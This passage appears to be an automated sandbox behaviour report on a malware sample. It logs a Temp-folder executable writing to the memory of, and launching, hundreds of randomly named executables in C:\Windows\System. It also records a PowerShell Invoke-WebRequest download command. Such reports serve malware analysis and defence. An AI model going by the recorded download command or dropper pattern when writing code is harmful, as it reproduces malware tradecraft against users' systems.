PID 2244 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\XCjvrMk.exe
PID 2244 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\XCjvrMk.exe
PID 2244 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\XCjvrMk.exe
PID 2244 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\rlqTeyb.exe
PID 2244 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\rlqTeyb.exe
PID 2244 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\rlqTeyb.exe
PID 2244 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\BzzzXmL.exe
PID 2244 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\BzzzXmL.exe
PID 2244 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\BzzzXmL.exe
PID 2244 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\SxzuejO.exe
PID 2244 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\SxzuejO.exe
PID 2244 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\SxzuejO.exe
PID 2244 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\IuyWWCD.exe
PID 2244 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\IuyWWCD.exe
PID 2244 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\IuyWWCD.exe
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\EAOnrIk.exe
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\EAOnrIk.exe
PID 2244 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\EAOnrIk.exe
PID 2244 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\GUdFGvu.exe
PID 2244 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\GUdFGvu.exe
PID 2244 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\GUdFGvu.exe
PID 2244 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\OyhyBtt.exe
PID 2244 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\OyhyBtt.exe
PID 2244 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\OyhyBtt.exe
PID 2244 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\ocWCgUC.exe
PID 2244 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\ocWCgUC.exe
PID 2244 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\ocWCgUC.exe
PID 2244 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\HADKonB.exe
PID 2244 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\HADKonB.exe
PID 2244 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\HADKonB.exe
PID 2244 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\NROggnf.exe
PID 2244 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\NROggnf.exe
PID 2244 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\NROggnf.exe
PID 2244 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\AxENnFt.exe
PID 2244 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\AxENnFt.exe
PID 2244 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\AxENnFt.exe
PID 2244 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\WtoRDXP.exe
PID 2244 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\WtoRDXP.exe
PID 2244 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\WtoRDXP.exe
PID 2244 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\riyahnI.exe
PID 2244 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\riyahnI.exe
PID 2244 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\riyahnI.exe
PID 2244 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\Szjcmbf.exe
PID 2244 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\Szjcmbf.exe
PID 2244 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\Szjcmbf.exe
PID 2244 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\BZxAsES.exe
PID 2244 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\BZxAsES.exe
PID 2244 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\BZxAsES.exe
PID 2244 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\YpEGkDe.exe
PID 2244 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\YpEGkDe.exe
PID 2244 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\YpEGkDe.exe
PID 2244 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\JbXvWVu.exe
PID 2244 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\JbXvWVu.exe
PID 2244 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\JbXvWVu.exe
PID 2244 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\pSjaQFX.exe
PID 2244 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\pSjaQFX.exe
PID 2244 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\pSjaQFX.exe
PID 2244 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe C:\Windows\System\qcgcnae.exe

Processes

C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\90b8683b5ad76c7f5b5a354fbe4c3640_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\RFjOCyb.exe

C:\Windows\System\RFjOCyb.exe

C:\Windows\System\XCjvrMk.exe

C:\Windows\System\XCjvrMk.exe

C:\Windows\System\rlqTeyb.exe

C:\Windows\System\rlqTeyb.exe

C:\Windows\System\BzzzXmL.exe

C:\Windows\System\BzzzXmL.exe

C:\Windows\System\SxzuejO.exe

C:\Windows\System\SxzuejO.exe

C:\Windows\System\IuyWWCD.exe

C:\Windows\System\IuyWWCD.exe

C:\Windows\System\EAOnrIk.exe

C:\Windows\System\EAOnrIk.exe

C:\Windows\System\GUdFGvu.exe

C:\Windows\System\GUdFGvu.exe

C:\Windows\System\OyhyBtt.exe

C:\Windows\System\OyhyBtt.exe

C:\Windows\System\ocWCgUC.exe

C:\Windows\System\ocWCgUC.exe

C:\Windows\System\HADKonB.exe

C:\Windows\System\HADKonB.exe

C:\Windows\System\NROggnf.exe

C:\Windows\System\NROggnf.exe

C:\Windows\System\AxENnFt.exe

C:\Windows\System\AxENnFt.exe

C:\Windows\System\WtoRDXP.exe

C:\Windows\System\WtoRDXP.exe

C:\Windows\System\riyahnI.exe

C:\Windows\System\riyahnI.exe

C:\Windows\System\Szjcmbf.exe

C:\Windows\System\Szjcmbf.exe

C:\Windows\System\BZxAsES.exe

C:\Windows\System\BZxAsES.exe

C:\Windows\System\YpEGkDe.exe

C:\Windows\System\YpEGkDe.exe

C:\Windows\System\JbXvWVu.exe

C:\Windows\System\JbXvWVu.exe

C:\Windows\System\pSjaQFX.exe

C:\Windows\System\pSjaQFX.exe

C:\Windows\System\qcgcnae.exe

C:\Windows\System\qcgcnae.exe

C:\Windows\System\kzXuSYy.exe

C:\Windows\System\kzXuSYy.exe

C:\Windows\System\sTwGySl.exe

C:\Windows\System\sTwGySl.exe

C:\Windows\System\JxOTmGq.exe

C:\Windows\System\JxOTmGq.exe

C:\Windows\System\asziuZD.exe

C:\Windows\System\asziuZD.exe

C:\Windows\System\JalxMOi.exe

C:\Windows\System\JalxMOi.exe

C:\Windows\System\aNDliJj.exe

C:\Windows\System\aNDliJj.exe

C:\Windows\System\XJnhyfE.exe

C:\Windows\System\XJnhyfE.exe

C:\Windows\System\RkFbpYU.exe

C:\Windows\System\RkFbpYU.exe

C:\Windows\System\rGfomqn.exe

C:\Windows\System\rGfomqn.exe

C:\Windows\System\BhbXRGX.exe

C:\Windows\System\BhbXRGX.exe

C:\Windows\System\fvSFAVv.exe

C:\Windows\System\fvSFAVv.exe

C:\Windows\System\nfYcIpm.exe

C:\Windows\System\nfYcIpm.exe

C:\Windows\System\PZCgIeT.exe

C:\Windows\System\PZCgIeT.exe

C:\Windows\System\rPZtbUL.exe

C:\Windows\System\rPZtbUL.exe

C:\Windows\System\DNTdqcy.exe

C:\Windows\System\DNTdqcy.exe

C:\Windows\System\yjVKhdt.exe

C:\Windows\System\yjVKhdt.exe

C:\Windows\System\cbMAJAl.exe

C:\Windows\System\cbMAJAl.exe

C:\Windows\System\TgtenWJ.exe

C:\Windows\System\TgtenWJ.exe

C:\Windows\System\BvcpvjM.exe

C:\Windows\System\BvcpvjM.exe

C:\Windows\System\PwFqYSl.exe

C:\Windows\System\PwFqYSl.exe

C:\Windows\System\pFOCMaG.exe

C:\Windows\System\pFOCMaG.exe

C:\Windows\System\meXIGLB.exe

C:\Windows\System\meXIGLB.exe

C:\Windows\System\pSuJpCv.exe

C:\Windows\System\pSuJpCv.exe

C:\Windows\System\cNspEcS.exe

C:\Windows\System\cNspEcS.exe

C:\Windows\System\XVDtBqU.exe

C:\Windows\System\XVDtBqU.exe

C:\Windows\System\vQZFUEV.exe

C:\Windows\System\vQZFUEV.exe

C:\Windows\System\hOXVyqk.exe

C:\Windows\System\hOXVyqk.exe

C:\Windows\System\BKCjsLF.exe

C:\Windows\System\BKCjsLF.exe

C:\Windows\System\xtnTUip.exe

C:\Windows\System\xtnTUip.exe

C:\Windows\System\ofryXuD.exe

C:\Windows\System\ofryXuD.exe

C:\Windows\System\QPEqhBX.exe

C:\Windows\System\QPEqhBX.exe

C:\Windows\System\tiMwXRT.exe

C:\Windows\System\tiMwXRT.exe

C:\Windows\System\iqmuueU.exe

C:\Windows\System\iqmuueU.exe

C:\Windows\System\IiROLBt.exe

C:\Windows\System\IiROLBt.exe

C:\Windows\System\CApnmzV.exe

C:\Windows\System\CApnmzV.exe

C:\Windows\System\DbfNQYv.exe

C:\Windows\System\DbfNQYv.exe

C:\Windows\System\UFahoPr.exe

C:\Windows\System\UFahoPr.exe

C:\Windows\System\vCzatNF.exe

C:\Windows\System\vCzatNF.exe

C:\Windows\System\ebfRRPQ.exe

C:\Windows\System\ebfRRPQ.exe

C:\Windows\System\uliLyEd.exe

C:\Windows\System\uliLyEd.exe

C:\Windows\System\JZUKLRC.exe

C:\Windows\System\JZUKLRC.exe

C:\Windows\System\FqOHSfg.exe

C:\Windows\System\FqOHSfg.exe

C:\Windows\System\hCUKVNi.exe

C:\Windows\System\hCUKVNi.exe

C:\Windows\System\nbZISCK.exe

C:\Windows\System\nbZISCK.exe

C:\Windows\System\PVaSYrP.exe

C:\Windows\System\PVaSYrP.exe

C:\Windows\System\bbQXsis.exe

C:\Windows\System\bbQXsis.exe

C:\Windows\System\RdgeQsW.exe

C:\Windows\System\RdgeQsW.exe

C:\Windows\System\dRwuWxV.exe

C:\Windows\System\dRwuWxV.exe

C:\Windows\System\ryjmYUE.exe

C:\Windows\System\ryjmYUE.exe

C:\Windows\System\ESHnfob.exe

C:\Windows\System\ESHnfob.exe

C:\Windows\System\HJtcuYi.exe

C:\Windows\System\HJtcuYi.exe

C:\Windows\System\htnyIow.exe

C:\Windows\System\htnyIow.exe

C:\Windows\System\njMhCYp.exe

C:\Windows\System\njMhCYp.exe

C:\Windows\System\UVznsHr.exe

C:\Windows\System\UVznsHr.exe

C:\Windows\System\gsgURUf.exe

C:\Windows\System\gsgURUf.exe

C:\Windows\System\jKiBRix.exe

C:\Windows\System\jKiBRix.exe

C:\Windows\System\ZBXdPrC.exe

C:\Windows\System\ZBXdPrC.exe

C:\Windows\System\pXAZyMV.exe

C:\Windows\System\pXAZyMV.exe

C:\Windows\System\qYSdKeP.exe

C:\Windows\System\qYSdKeP.exe

C:\Windows\System\PGBGJCP.exe

C:\Windows\System\PGBGJCP.exe

C:\Windows\System\VfZTXHo.exe

C:\Windows\System\VfZTXHo.exe

C:\Windows\System\QFysigv.exe

C:\Windows\System\QFysigv.exe

C:\Windows\System\kqcTvAi.exe

C:\Windows\System\kqcTvAi.exe

C:\Windows\System\RSiSMcG.exe

C:\Windows\System\RSiSMcG.exe

C:\Windows\System\qWySkzx.exe

C:\Windows\System\qWySkzx.exe

C:\Windows\System\hBLWcBD.exe

C:\Windows\System\hBLWcBD.exe

C:\Windows\System\zzghGYd.exe

C:\Windows\System\zzghGYd.exe

C:\Windows\System\yHfWzrs.exe

C:\Windows\System\yHfWzrs.exe

C:\Windows\System\djvIYDR.exe

C:\Windows\System\djvIYDR.exe

C:\Windows\System\pZlpgip.exe

C:\Windows\System\pZlpgip.exe

C:\Windows\System\ytUqpyn.exe

C:\Windows\System\ytUqpyn.exe

C:\Windows\System\EoBChVy.exe

C:\Windows\System\EoBChVy.exe

C:\Windows\System\iDdiEIZ.exe

C:\Windows\System\iDdiEIZ.exe

C:\Windows\System\HySNLYa.exe

C:\Windows\System\HySNLYa.exe

C:\Windows\System\qlWIZDc.exe

C:\Windows\System\qlWIZDc.exe

C:\Windows\System\bdHIwTi.exe

C:\Windows\System\bdHIwTi.exe

C:\Windows\System\WyXdtFx.exe

C:\Windows\System\WyXdtFx.exe

C:\Windows\System\bUlUxIW.exe

C:\Windows\System\bUlUxIW.exe

C:\Windows\System\aYamWEn.exe

C:\Windows\System\aYamWEn.exe

C:\Windows\System\qjDzoUh.exe

C:\Windows\System\qjDzoUh.exe

C:\Windows\System\FYyCfkf.exe

C:\Windows\System\FYyCfkf.exe

C:\Windows\System\nqUlNOd.exe

C:\Windows\System\nqUlNOd.exe

C:\Windows\System\ORlruIE.exe

C:\Windows\System\ORlruIE.exe

C:\Windows\System\rWiKFEA.exe

C:\Windows\System\rWiKFEA.exe

C:\Windows\System\lTkehqm.exe

C:\Windows\System\lTkehqm.exe

C:\Windows\System\VDHlccE.exe

C:\Windows\System\VDHlccE.exe

C:\Windows\System\AxXZPGL.exe

C:\Windows\System\AxXZPGL.exe

C:\Windows\System\BNYfDIB.exe

C:\Windows\System\BNYfDIB.exe

C:\Windows\System\WBBhmlf.exe

C:\Windows\System\WBBhmlf.exe

C:\Windows\System\gfMqJWg.exe

C:\Windows\System\gfMqJWg.exe

C:\Windows\System\SPeUoyt.exe

C:\Windows\System\SPeUoyt.exe

C:\Windows\System\OkWGETb.exe

C:\Windows\System\OkWGETb.exe

C:\Windows\System\xIePTlq.exe

C:\Windows\System\xIePTlq.exe

C:\Windows\System\GLYZQwv.exe

C:\Windows\System\GLYZQwv.exe

C:\Windows\System\xlCsMxj.exe

C:\Windows\System\xlCsMxj.exe

C:\Windows\System\NsCfiII.exe

C:\Windows\System\NsCfiII.exe

C:\Windows\System\zbZfkkM.exe

C:\Windows\System\zbZfkkM.exe

C:\Windows\System\FEyJefj.exe

C:\Windows\System\FEyJefj.exe

C:\Windows\System\XogAaQW.exe

C:\Windows\System\XogAaQW.exe

C:\Windows\System\otOlmGF.exe

C:\Windows\System\otOlmGF.exe

C:\Windows\System\eePIfiK.exe

C:\Windows\System\eePIfiK.exe

C:\Windows\System\ASKPZML.exe

C:\Windows\System\ASKPZML.exe

C:\Windows\System\yCayVvb.exe

C:\Windows\System\yCayVvb.exe

C:\Windows\System\cebcSAO.exe

C:\Windows\System\cebcSAO.exe

C:\Windows\System\laRXuog.exe

C:\Windows\System\laRXuog.exe

C:\Windows\System\dIaHwLp.exe

C:\Windows\System\dIaHwLp.exe

C:\Windows\System\qMUmMNU.exe

C:\Windows\System\qMUmMNU.exe

C:\Windows\System\KyxOxSg.exe

C:\Windows\System\KyxOxSg.exe

C:\Windows\System\xdRRKts.exe

C:\Windows\System\xdRRKts.exe

C:\Windows\System\XyHtulK.exe

C:\Windows\System\XyHtulK.exe

C:\Windows\System\eWbAnWl.exe

C:\Windows\System\eWbAnWl.exe

C:\Windows\System\GiFIAWd.exe

C:\Windows\System\GiFIAWd.exe

C:\Windows\System\itGVVSA.exe

C:\Windows\System\itGVVSA.exe

C:\Windows\System\saZhmMm.exe

C:\Windows\System\saZhmMm.exe

C:\Windows\System\WBpVmAs.exe

C:\Windows\System\WBpVmAs.exe

C:\Windows\System\xiCpWXu.exe

C:\Windows\System\xiCpWXu.exe

C:\Windows\System\RtDOBBx.exe

C:\Windows\System\RtDOBBx.exe

C:\Windows\System\syvccFb.exe

C:\Windows\System\syvccFb.exe

C:\Windows\System\zulIQQS.exe

C:\Windows\System\zulIQQS.exe

C:\Windows\System\cADGQhe.exe

C:\Windows\System\cADGQhe.exe

C:\Windows\System\XcAFBiV.exe

C:\Windows\System\XcAFBiV.exe

C:\Windows\System\AznHOEm.exe

C:\Windows\System\AznHOEm.exe

C:\Windows\System\Edpknnh.exe

C:\Windows\System\Edpknnh.exe

C:\Windows\System\mlyfFcj.exe

C:\Windows\System\mlyfFcj.exe

C:\Windows\System\MBVNqNX.exe

C:\Windows\System\MBVNqNX.exe

C:\Windows\System\aEEWTGi.exe

C:\Windows\System\aEEWTGi.exe

C:\Windows\System\HILWpCU.exe

C:\Windows\System\HILWpCU.exe

C:\Windows\System\yfIVdIl.exe

C:\Windows\System\yfIVdIl.exe

C:\Windows\System\FwKBprC.exe

C:\Windows\System\FwKBprC.exe

C:\Windows\System\iWbJAwh.exe

C:\Windows\System\iWbJAwh.exe

C:\Windows\System\LyusLsV.exe

C:\Windows\System\LyusLsV.exe

C:\Windows\System\bVhKnBh.exe

C:\Windows\System\bVhKnBh.exe

C:\Windows\System\FlQkeGI.exe

C:\Windows\System\FlQkeGI.exe

C:\Windows\System\XtUOfqo.exe

C:\Windows\System\XtUOfqo.exe

C:\Windows\System\zDiiOyR.exe

C:\Windows\System\zDiiOyR.exe

C:\Windows\System\VYENlph.exe

C:\Windows\System\VYENlph.exe

C:\Windows\System\KWcCYLK.exe

C:\Windows\System\KWcCYLK.exe

C:\Windows\System\bZjjEfd.exe

C:\Windows\System\bZjjEfd.exe

C:\Windows\System\AHdUWsH.exe

C:\Windows\System\AHdUWsH.exe

C:\Windows\System\pOnGmVz.exe

C:\Windows\System\pOnGmVz.exe

C:\Windows\System\cUTLHVw.exe

C:\Windows\System\cUTLHVw.exe

C:\Windows\System\ihtgfyT.exe

C:\Windows\System\ihtgfyT.exe

C:\Windows\System\BCtqAtT.exe

C:\Windows\System\BCtqAtT.exe

C:\Windows\System\ZgrlvaK.exe

C:\Windows\System\ZgrlvaK.exe

C:\Windows\System\SMKSmcJ.exe

C:\Windows\System\SMKSmcJ.exe

C:\Windows\System\fZBXVSY.exe

C:\Windows\System\fZBXVSY.exe

C:\Windows\System\csjCPGF.exe

C:\Windows\System\csjCPGF.exe

C:\Windows\System\TisMcPG.exe

C:\Windows\System\TisMcPG.exe

C:\Windows\System\QdGEfRn.exe

C:\Windows\System\QdGEfRn.exe

C:\Windows\System\iICorYl.exe

C:\Windows\System\iICorYl.exe

C:\Windows\System\UxKckbG.exe

C:\Windows\System\UxKckbG.exe

C:\Windows\System\akrzuSh.exe

C:\Windows\System\akrzuSh.exe

C:\Windows\System\VbJImBl.exe

C:\Windows\System\VbJImBl.exe

C:\Windows\System\JswlcVG.exe

C:\Windows\System\JswlcVG.exe

C:\Windows\System\uAxPTVj.exe

C:\Windows\System\uAxPTVj.exe

C:\Windows\System\sIApLrB.exe

C:\Windows\System\sIApLrB.exe

C:\Windows\System\AcQXKKL.exe

C:\Windows\System\AcQXKKL.exe

C:\Windows\System\MMgyRdw.exe

C:\Windows\System\MMgyRdw.exe

C:\Windows\System\iERWNuE.exe

C:\Windows\System\iERWNuE.exe

C:\Windows\System\vVgGeBj.exe

C:\Windows\System\vVgGeBj.exe

C:\Windows\System\NKWXEqw.exe

C:\Windows\System\NKWXEqw.exe

C:\Windows\System\boVQYix.exe

C:\Windows\System\boVQYix.exe

C:\Windows\System\ehQZccG.exe

C:\Windows\System\ehQZccG.exe

C:\Windows\System\BCaInAV.exe

C:\Windows\System\BCaInAV.exe

C:\Windows\System\OIQhDCj.exe

C:\Windows\System\OIQhDCj.exe

C:\Windows\System\yyoUGpb.exe

C:\Windows\System\yyoUGpb.exe

C:\Windows\System\TMcKIzK.exe

C:\Windows\System\TMcKIzK.exe

C:\Windows\System\NkwCTjw.exe

C:\Windows\System\NkwCTjw.exe

C:\Windows\System\NYnLUKt.exe

C:\Windows\System\NYnLUKt.exe

C:\Windows\System\zkIXnIy.exe

C:\Windows\System\zkIXnIy.exe

C:\Windows\System\hCHvnSr.exe

C:\Windows\System\hCHvnSr.exe

C:\Windows\System\aYaKiqO.exe

C:\Windows\System\aYaKiqO.exe

C:\Windows\System\StbWFNq.exe

C:\Windows\System\StbWFNq.exe

C:\Windows\System\RVpMYqK.exe

C:\Windows\System\RVpMYqK.exe

C:\Windows\System\jZMuRtH.exe

C:\Windows\System\jZMuRtH.exe

C:\Windows\System\meJXCtU.exe

C:\Windows\System\meJXCtU.exe

C:\Windows\System\alzLMTL.exe

C:\Windows\System\alzLMTL.exe

C:\Windows\System\NFMjrMZ.exe

C:\Windows\System\NFMjrMZ.exe

C:\Windows\System\EWYCayc.exe

C:\Windows\System\EWYCayc.exe

C:\Windows\System\pZbraqT.exe

C:\Windows\System\pZbraqT.exe

C:\Windows\System\dwwotxj.exe

C:\Windows\System\dwwotxj.exe

C:\Windows\System\WvyjeRU.exe

C:\Windows\System\WvyjeRU.exe

C:\Windows\System\TaCanJW.exe

C:\Windows\System\TaCanJW.exe

C:\Windows\System\XyMJISB.exe

C:\Windows\System\XyMJISB.exe

C:\Windows\System\fxjEXSn.exe

C:\Windows\System\fxjEXSn.exe

C:\Windows\System\LZEEJVa.exe

C:\Windows\System\LZEEJVa.exe

C:\Windows\System\BmTosbo.exe

C:\Windows\System\BmTosbo.exe

C:\Windows\System\yPRbPiL.exe

C:\Windows\System\yPRbPiL.exe

C:\Windows\System\yiuhRNL.exe

C:\Windows\System\yiuhRNL.exe

C:\Windows\System\jHmlBVS.exe

C:\Windows\System\jHmlBVS.exe

C:\Windows\System\uxruWdK.exe

C:\Windows\System\uxruWdK.exe

C:\Windows\System\lhBxLPc.exe

C:\Windows\System\lhBxLPc.exe

C:\Windows\System\hogfdrQ.exe

C:\Windows\System\hogfdrQ.exe

C:\Windows\System\gFZPUTL.exe

C:\Windows\System\gFZPUTL.exe

C:\Windows\System\yNzMFPf.exe

C:\Windows\System\yNzMFPf.exe

C:\Windows\System\hEslVnC.exe

C:\Windows\System\hEslVnC.exe

C:\Windows\System\TCpBgkW.exe

C:\Windows\System\TCpBgkW.exe

C:\Windows\System\nhWJvwl.exe

C:\Windows\System\nhWJvwl.exe

C:\Windows\System\QMDROGU.exe

C:\Windows\System\QMDROGU.exe

C:\Windows\System\KATquDT.exe

C:\Windows\System\KATquDT.exe

C:\Windows\System\TjKxzqk.exe

C:\Windows\System\TjKxzqk.exe

C:\Windows\System\yKpcjGf.exe

C:\Windows\System\yKpcjGf.exe

C:\Windows\System\QVdNXrg.exe

C:\Windows\System\QVdNXrg.exe

C:\Windows\System\aFaIDfC.exe

C:\Windows\System\aFaIDfC.exe

C:\Windows\System\gqrDuMt.exe

C:\Windows\System\gqrDuMt.exe

C:\Windows\System\vihxGGe.exe

C:\Windows\System\vihxGGe.exe

C:\Windows\System\dGfhRdH.exe

C:\Windows\System\dGfhRdH.exe

C:\Windows\System\CpIZHKJ.exe

C:\Windows\System\CpIZHKJ.exe

C:\Windows\System\kpTyFQi.exe

C:\Windows\System\kpTyFQi.exe

C:\Windows\System\UebsUSy.exe

C:\Windows\System\UebsUSy.exe

C:\Windows\System\uTcSEjf.exe

C:\Windows\System\uTcSEjf.exe

C:\Windows\System\fsPCGqv.exe

C:\Windows\System\fsPCGqv.exe

C:\Windows\System\yQsKByy.exe

